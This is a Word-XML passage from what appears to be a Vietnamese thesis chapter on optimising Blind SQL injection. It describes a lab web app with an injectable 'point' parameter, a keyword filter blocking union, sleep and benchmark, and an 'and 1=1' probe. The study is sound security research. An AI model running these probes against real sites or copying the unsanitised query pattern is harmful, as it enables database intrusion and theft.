    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc459374354"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Xây dựng thực nghiệm và đánh giá kết quả tố</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:t>i ưu hóa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="00BA74A3" w:rsidRDefault="00BA74A3" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần này</w:t>
      </w:r>
      <w:r w:rsidR="004F5035">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, luận văn sẽ trình bày về thử nghiệm phương pháp tối ưu dựa trên phân tích thứ tự nội dung trả về so với các phương pháp khác trong tấn công Blind SQL injection. Tiêu chí để đánh giá sự tối ưu dựa trên: Số lượng yêu cầu gửi lên, và thời gian sử dụng để tấn công (Thời gian để lấy 1 ký tự, hoặc một chuỗi ký tự).</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB36A9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Môi trường t</w:t>
      </w:r>
      <w:r w:rsidR="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hực nghiệm cần xây dựng các thành phần chính:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="00673CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Môi trường ứng dụng web mắc lỗi Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="00673CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mã tấn công mô phỏng các thuật toán</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRPr="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="00673CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673CE2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Công cụ thu thập các kết quả, tiêu chí để đánh giá tối ưu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF58E1" w:rsidRPr="00BF58E1" w:rsidRDefault="00BF58E1" w:rsidP="00BF58E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc458409309"/>
      <w:bookmarkStart w:id="132" w:name="_Toc458409379"/>
      <w:bookmarkStart w:id="133" w:name="_Toc458433505"/>
      <w:bookmarkStart w:id="134" w:name="_Toc459373922"/>
      <w:bookmarkStart w:id="135" w:name="_Toc459373982"/>
      <w:bookmarkStart w:id="136" w:name="_Toc459374355"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="00BF58E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc459374356"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Xây dựng môi trường </w:t>
      </w:r>
      <w:r w:rsidR="007B258A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00673CE2" w:rsidRDefault="00673CE2" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để thử nghiệm tấn công, luận văn sẽ xây dựng môi trường giả lập</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> một ứng dụng web mắc lỗi Blind SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Luận văn sử dụng ngôn ngữ lập trình là PHP và hệ quản trị CSDL là MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vì đây là ngôn ngữ lập trình, cũng như</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> hệ quản trị CSDL phổ biến trên thế giới.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5CC1" w:rsidRDefault="00D655B3" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ứ</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ng dụng mô phỏng là một trang web, có chức năng tra </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xem</w:t>
      </w:r>
      <w:r w:rsidR="00973F77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> điểm thi, người dùng nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00144329">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">điểm mình muốn xem, ứng dụng sẽ truy vấn tìm những thí sinh có điểm thi cao hơn mức điểm đó. </w:t>
      </w:r>
      <w:r w:rsidR="003D3A27">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trường hợp không nhập mức điểm ứng dụng sẽ hiển thị toàn bộ danh sách thí sinh. </w:t>
      </w:r>
      <w:r w:rsidR="00144329">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc nhập mức điểm thông qua tham số point, ứng dụng sẽ lấy tham số này vào truyền vào câu truy vấn SQL. Đây chính là nguyên nhân gây lỗi SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004046D2" w:rsidRDefault="004046D2" w:rsidP="004046D2">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4417AB8A" wp14:editId="5B1CAB51">
            <wp:extent cx="5076825" cy="541020"/>
            <wp:effectExtent l="19050" t="0" r="952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076825" cy="541020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5CC1" w:rsidRPr="004046D2" w:rsidRDefault="004046D2" w:rsidP="004046D2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc458436436"/>
      <w:r w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004046D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1" w:rsidRPr="00DD5CC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Dòng code gây ra lỗi SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="00973F77" w:rsidRDefault="00075263" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trang web lỗi đặt tại địa chỉ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00BA000F" w:rsidRPr="00A56025">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.1.59/vul.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00797E7B" w:rsidRDefault="00797E7B" w:rsidP="00B3299C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E528A0" wp14:editId="73547909">
            <wp:extent cx="1733702" cy="2047814"/>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1735288" cy="2049687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797E7B" w:rsidRDefault="00797E7B" w:rsidP="00797E7B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc458436437"/>
      <w:r w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00797E7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Hiển thị toàn bộ danh sách nếu không có mức điểm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="00B3299C" w:rsidRDefault="00B3299C" w:rsidP="00B3299C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB4324D" wp14:editId="3DFA7A55">
            <wp:extent cx="1781653" cy="1397203"/>
            <wp:effectExtent l="19050" t="0" r="9047"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1781922" cy="1397414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3299C" w:rsidRPr="00B3299C" w:rsidRDefault="00B3299C" w:rsidP="00B3299C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc458436438"/>
      <w:r w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B3299C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Hiển thị những thí sinh có điểm thi lớn hơn 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="00FF7B8A" w:rsidRDefault="00FE627D" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để phòng tránh lỗi SQL injection, lập trình viên đã sử dụng bộ lọc từ khóa,  trong đó có từ</w:t>
      </w:r>
      <w:r w:rsidR="00CD259A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> khóa union, trang web cũng được cấu hình không cho phép hiển thị chi tiết lỗi. Chính vì thế, các phương pháp tấn công sử dụng Error base và Union Base không sử dụng được trong trường hợp này.</w:t>
      </w:r>
      <w:r w:rsidR="00F37E33">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3F37" w:rsidRDefault="005F3F37" w:rsidP="005F3F37">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D33D7DC" wp14:editId="58ECE99D">
            <wp:extent cx="4403750" cy="1773861"/>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4407464" cy="1775357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521EC1" w:rsidRPr="005F3F37" w:rsidRDefault="005F3F37" w:rsidP="005F3F37">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc458436439"/>
      <w:r w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005F3F37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00521EC1" w:rsidRPr="00521EC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Đoạn code lọc từ khóa Union</w:t>
      </w:r>
      <w:r w:rsidR="00090566">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, sleep, bench</w:t>
      </w:r>
      <w:r w:rsidR="00521EC1" w:rsidRPr="00521EC1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mark….</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00DD5B0D" w:rsidRDefault="00DD5B0D" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để kiểm tra ứng dụng web mắc lỗi SQL injection hay không, thử nghiệm nhập vào cặp mã tấn công tạo điều kiện True/False</w:t>
      </w:r>
      <w:r w:rsidR="006B1F99">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào tham số </w:t>
      </w:r>
      <w:r w:rsidR="004C4D20">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016449D" w:rsidRDefault="0016449D" w:rsidP="0016449D">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13CB0BF2" wp14:editId="6F960992">
            <wp:extent cx="1977431" cy="1784909"/>
            <wp:effectExtent l="19050" t="0" r="3769"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1980541" cy="1787716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016449D" w:rsidRDefault="0016449D" w:rsidP="0016449D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc458436440"/>
      <w:r w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0016449D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Trả về toàn bộ danh sách khi điều kiện là True</w:t>
      </w:r>
      <w:r w:rsidR="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and 1=1).</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="0007360D" w:rsidRDefault="0007360D" w:rsidP="0007360D">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FA0AE4" wp14:editId="3880B98D">
